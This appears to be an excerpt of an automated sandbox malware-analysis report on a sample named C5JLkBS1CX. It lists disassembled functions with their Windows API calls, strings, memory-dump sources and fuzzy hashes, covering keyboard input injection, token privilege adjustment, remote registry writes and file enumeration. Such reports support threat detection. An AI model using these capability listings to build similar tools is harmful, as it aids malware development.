Instruction Fuzzy Hash: 47F03971505791CFCB389F66E494823BBE9BF143693248A7EE1D782620C7729840DF41

Function 00600791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006007B0

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: f890e76665c4c9b0900f129d862eb223be873004cc412428c4a2e84ff5080748
Instruction ID: 296992953d3f9b7c3294e05f51901417c01e320512e884626b7ad1223eac230b
Opcode Fuzzy Hash: f890e76665c4c9b0900f129d862eb223be873004cc412428c4a2e84ff5080748
Instruction Fuzzy Hash: F6E0CD3690412857C720D7999C05FEA77DDDFCD7A0F0841B5FD0CD7204D9A09D8086D0

Function 00648E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00648EC1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 3cad14653bd125ae654eef793b97441f0ef65ce3e07d3620aa747ff99630847a
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: F4E092B0104B005FD7398A24D800BE373E2AB05304F00081DF2AA83341EB6278418B59

Function 0060525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00605266

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 966bf12c43d2a96f46cf07a79b0d8558e31ef2346848bb95419868be6b041d75
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 3CB0927648020C77CE012A82EC02A4A3B1A9B41764F408020FB0C181A2A673A6649A89

Function 0118A114 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0118A129

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 98d524ffd1b40a67511250ec2094769778354e9ef7c0db88768bdfd3108610c5
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: BCE0BF7494110DEFDB00EFA8D5496DD7BB4EF04301F1045A1FD05D7680DB309E548A62

Function 0118A118 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0118A129

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 1534b5f455cb234ab1a0102169d97952341e1a5a03e6b556481ac58af241332d
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2AE0E67494110DDFDB00EFB8D54969D7BB4EF04301F104161FD01D2280D7309D508A62

Non-executed Functions

Function 0066CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0066CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066CB95
GetWindowLongW.USER32(?,000000F0), ref: 0066CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066CC00
SendMessageW.USER32 ref: 0066CC29
_wcsncpy.LIBCMT ref: 0066CC95
GetKeyState.USER32(00000011), ref: 0066CCB6
GetKeyState.USER32(00000009), ref: 0066CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066CCD9
GetKeyState.USER32(00000010), ref: 0066CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066CD0C
SendMessageW.USER32 ref: 0066CD33
SendMessageW.USER32(?,00001030,?,0066B348), ref: 0066CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0066CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0066CE60
SetCapture.USER32(?), ref: 0066CE69
ClientToScreen.USER32(?,?), ref: 0066CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0066CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0066CEF5
ReleaseCapture.USER32 ref: 0066CF00
GetCursorPos.USER32(?), ref: 0066CF3A
ScreenToClient.USER32(?,?), ref: 0066CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0066CFA3
SendMessageW.USER32 ref: 0066CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0066D00E
SendMessageW.USER32 ref: 0066D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0066D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0066D06D
GetCursorPos.USER32(?), ref: 0066D08D
ScreenToClient.USER32(?,?), ref: 0066D09A
GetParent.USER32(?), ref: 0066D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0066D123
SendMessageW.USER32 ref: 0066D154
ClientToScreen.USER32(?,?), ref: 0066D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0066D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0066D20C
SendMessageW.USER32 ref: 0066D22F
ClientToScreen.USER32(?,?), ref: 0066D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0066D2B5

Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC

GetWindowLongW.USER32(?,000000F0), ref: 0066D351

Strings

pbj, xrefs: 0066CEAF
@GUI_DRAGID, xrefs: 0066CE9C
F, xrefs: 0066D235

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbj
API String ID: 3977979337-2936828815
Opcode ID: 7a111c76ba4ee901c65e9f1b1d6b64489f27de8cd3e0985d90326c478966eb32
Instruction ID: c705fc3e92902fd19e9993b9df2a69aeb2909e510b6c2aa7d3e5824050a68dae
Opcode Fuzzy Hash: 7a111c76ba4ee901c65e9f1b1d6b64489f27de8cd3e0985d90326c478966eb32
Instruction Fuzzy Hash: FE42CC74604A81AFCB24DF24D858ABABBE6FF49320F140519F5A6D73B1C771E840DB92

Function 005F6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005F71C3
_memset.LIBCMT ref: 005F7539
_memmove.LIBCMT ref: 005F76AC

Strings

\b(?=\w), xrefs: 00633769
3c_, xrefs: 006323A0
]i, xrefs: 00631A22
[:<:]], xrefs: 005F7479
\b(?<=\w), xrefs: 00633773
DEFINE, xrefs: 00632103
__, xrefs: 006323CB
Q\E, xrefs: 005F7FCB
[:>:]], xrefs: 005F7492
P\i, xrefs: 00631AB8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]i$3c_$DEFINE$P\i$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$__
API String ID: 1357608183-1656013260
Opcode ID: f0e8f2c07b420d4f4a8b842f7c48c41804d98ed8f81b5edb8e90c3ab4e7d78ec
Instruction ID: bcc21eb8c0027f098d4ba44923ef5d30828a02acbfab5030b8c33a37d6ea3725
Opcode Fuzzy Hash: f0e8f2c07b420d4f4a8b842f7c48c41804d98ed8f81b5edb8e90c3ab4e7d78ec
Instruction Fuzzy Hash: 74939375A04219DBDB24CF58C891BFDB7B2FF48710F24856AE945AB381E7749E81CB80

Function 005E48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 005E48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0061D665
IsIconic.USER32(?), ref: 0061D66E
ShowWindow.USER32(?,00000009), ref: 0061D67B
SetForegroundWindow.USER32(?), ref: 0061D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0061D69B
GetCurrentThreadId.KERNEL32 ref: 0061D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0061D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0061D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0061D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0061D6CF
SetForegroundWindow.USER32(?), ref: 0061D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D6E7
keybd_event.USER32(00000012,00000000), ref: 0061D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D6FC
keybd_event.USER32(00000012,00000000), ref: 0061D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D70A
keybd_event.USER32(00000012,00000000), ref: 0061D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D719
keybd_event.USER32(00000012,00000000), ref: 0061D71E
SetForegroundWindow.USER32(?), ref: 0061D721
AttachThreadInput.USER32(?,?,00000000), ref: 0061D748

Strings

Shell_TrayWnd, xrefs: 0061D660

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: bec7c6947caaef9b00e9c57d252485887dbdefd7846b5d5c4cdccc9ae57d7f02
Instruction ID: 066aaeeaec68bcc1e3e5229e30963d92f9dc9489d9aab33316ac03197f133ed8
Opcode Fuzzy Hash: bec7c6947caaef9b00e9c57d252485887dbdefd7846b5d5c4cdccc9ae57d7f02
Instruction Fuzzy Hash: 01319471A40318BBEB206F61AC49FBF7F6EEB44B50F145025FA05EA1D1CAF05D41ABA1

Function 00638310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
Part of subcall function 006387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
Part of subcall function 006387E1: GetLastError.KERNEL32 ref: 00638865

_memset.LIBCMT ref: 00638353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006383A5
CloseHandle.KERNEL32(?), ref: 006383B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006383CD
GetProcessWindowStation.USER32 ref: 006383E6
SetProcessWindowStation.USER32(00000000), ref: 006383F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0063840A

Part of subcall function 006381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00638309), ref: 006381E0
Part of subcall function 006381CB: CloseHandle.KERNEL32(?,?,00638309), ref: 006381F2

Strings

winsta0, xrefs: 006383C8
, xrefs: 00638362
default, xrefs: 00638405

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 5df515fc03bf6ecd0428f51b69b18d14457b43a99a479d5d0e95794c58713be2
Instruction ID: dcfd7d734ac4d16782d007bf47004605d365bcc7e30699b9eeead66aed2a200a
Opcode Fuzzy Hash: 5df515fc03bf6ecd0428f51b69b18d14457b43a99a479d5d0e95794c58713be2
Instruction Fuzzy Hash: 888168B2900309AFDF519FA4DC45AEEBBBAFF04314F144169F910A72A1DB718E14DBA0

Function 0064C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0064C78D
FindClose.KERNEL32(00000000), ref: 0064C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0064C844
__swprintf.LIBCMT ref: 0064C890
__swprintf.LIBCMT ref: 0064C8D3

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

__swprintf.LIBCMT ref: 0064C927

Part of subcall function 00603698: __woutput_l.LIBCMT ref: 006036F1

__swprintf.LIBCMT ref: 0064C975

Part of subcall function 00603698: __flsbuf.LIBCMT ref: 00603713
Part of subcall function 00603698: __flsbuf.LIBCMT ref: 0060372B

__swprintf.LIBCMT ref: 0064C9C4
__swprintf.LIBCMT ref: 0064CA13
__swprintf.LIBCMT ref: 0064CA62

Strings

%4d, xrefs: 0064C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 0064C88A
%02d, xrefs: 0064C91B, 0064C925, 0064C973, 0064C9C2, 0064CA11, 0064CA60

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: ebc93aab1897365ef8ff909b54e333fb7c9d7f5f49eaec6a381a1a771a86ce87
Instruction ID: 7d5c08b49e1f77d528540224106f9adc6376224d589534f239100a433a7108c5
Opcode Fuzzy Hash: ebc93aab1897365ef8ff909b54e333fb7c9d7f5f49eaec6a381a1a771a86ce87
Instruction Fuzzy Hash: 88A12DB1408245ABC754EFA5C889DAFBBEDFF95704F400929F585C7291EB31DA08CB62

Function 0064EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0064EFB6
_wcscmp.LIBCMT ref: 0064EFCB
_wcscmp.LIBCMT ref: 0064EFE2
GetFileAttributesW.KERNEL32(?), ref: 0064EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0064F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0064F026
FindClose.KERNEL32(00000000), ref: 0064F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0064F04D
_wcscmp.LIBCMT ref: 0064F074
_wcscmp.LIBCMT ref: 0064F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0064F09D
SetCurrentDirectoryW.KERNEL32(00698920), ref: 0064F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0064F0C5
FindClose.KERNEL32(00000000), ref: 0064F0D2
FindClose.KERNEL32(00000000), ref: 0064F0E4

Strings

*.*, xrefs: 0064F048

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 70a7aecb3e54c977541834d11498cc7970ffbf202ec7c2605272c2216b8cf44e
Instruction ID: aed053ca0b8faeb9b5ecaee9b78da54441947ca1acbb4cb28171a6f55c517e02
Opcode Fuzzy Hash: 70a7aecb3e54c977541834d11498cc7970ffbf202ec7c2605272c2216b8cf44e
Instruction Fuzzy Hash: A131C3325012196EDB14DFA4EC68AEE77AE9F89760F100176E804E32A1DBB1DA44CF65

Function 00660857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00660953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0066F910,00000000,?,00000000,?,?), ref: 006609C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00660A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00660A92
RegCloseKey.ADVAPI32(?), ref: 00660DB2
RegCloseKey.ADVAPI32(00000000), ref: 00660DBF

Strings

REG_MULTI_SZ, xrefs: 00660B7A
REG_QWORD, xrefs: 00660D00
REG_BINARY, xrefs: 00660D4D
REG_EXPAND_SZ, xrefs: 00660A2F
REG_DWORD, xrefs: 00660C83
REG_SZ, xrefs: 00660AD0

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 8807cd2cb7ab82084003b80f9c379f0458ab9e5708c601d2226ba08fb6775964
Instruction ID: ee0c54a106a49ab6535d8467cdd840cf08f162080caa87c86a61238a0b8b5450
Opcode Fuzzy Hash: 8807cd2cb7ab82084003b80f9c379f0458ab9e5708c601d2226ba08fb6775964
Instruction Fuzzy Hash: A60238756046429FDB58DF15C855A6BBBE6FF89314F04856CF88A9B3A2DB30EC01CB81

Function 005F66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 0063112E
0Dh, xrefs: 005F6733
pGh, xrefs: 005F6751
LIMIT_RECURSION=, xrefs: 006311FC
UCP), xrefs: 0063110D
ANYCRLF), xrefs: 006312FB
ANY), xrefs: 006312DE
LIMIT_MATCH=, xrefs: 00631170
__, xrefs: 00631465, 0063150C, 006315B4
CRLF), xrefs: 006312C1
BSR_ANYCRLF), xrefs: 0063131E
BSR_UNICODE), xrefs: 00631338
NO_START_OPT), xrefs: 0063114F
3c_, xrefs: 005F68FF
UTF), xrefs: 006310FA
0Eh, xrefs: 005F673D
CR), xrefs: 00631287
0Fh, xrefs: 005F6747
UTF16), xrefs: 006310CF
LF), xrefs: 006312A4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID: 0Dh$0Eh$0Fh$3c_$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGh$__
API String ID: 0-4200035643
Opcode ID: ee07f29342c8ab17ca7998ba13a6977a5bd2a471822c2b7dcaf5902ebac45b07
Instruction ID: b528b352dced2a8901c003d3dc2d5442010264440aa849d028013fff7eb2915f
Opcode Fuzzy Hash: ee07f29342c8ab17ca7998ba13a6977a5bd2a471822c2b7dcaf5902ebac45b07
Instruction Fuzzy Hash: 25724C75E00219DADB14DF58C8817FEBBB6FF49310F14816AE945EB291EB349E81CB90

Function 0064F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0064F113
_wcscmp.LIBCMT ref: 0064F128
_wcscmp.LIBCMT ref: 0064F13F

Part of subcall function 00644385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006443A0

FindNextFileW.KERNEL32(00000000,?), ref: 0064F16E
FindClose.KERNEL32(00000000), ref: 0064F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0064F195
_wcscmp.LIBCMT ref: 0064F1BC
_wcscmp.LIBCMT ref: 0064F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0064F1E5
SetCurrentDirectoryW.KERNEL32(00698920), ref: 0064F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0064F20D
FindClose.KERNEL32(00000000), ref: 0064F21A
FindClose.KERNEL32(00000000), ref: 0064F22C

Strings

*.*, xrefs: 0064F190

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 529980b1cd466413e844897aed8a57ee31feb5d0471339703385386ba99fcee7
Instruction ID: c5af83d503df078f7f8a85add047be284ac74791144d6778508bef38b163610b
Opcode Fuzzy Hash: 529980b1cd466413e844897aed8a57ee31feb5d0471339703385386ba99fcee7
Instruction Fuzzy Hash: 1F31E5365012197EDF14AFA4EC59AEF77AE9F45360F100175E800E32A0DBB1DF45CA58

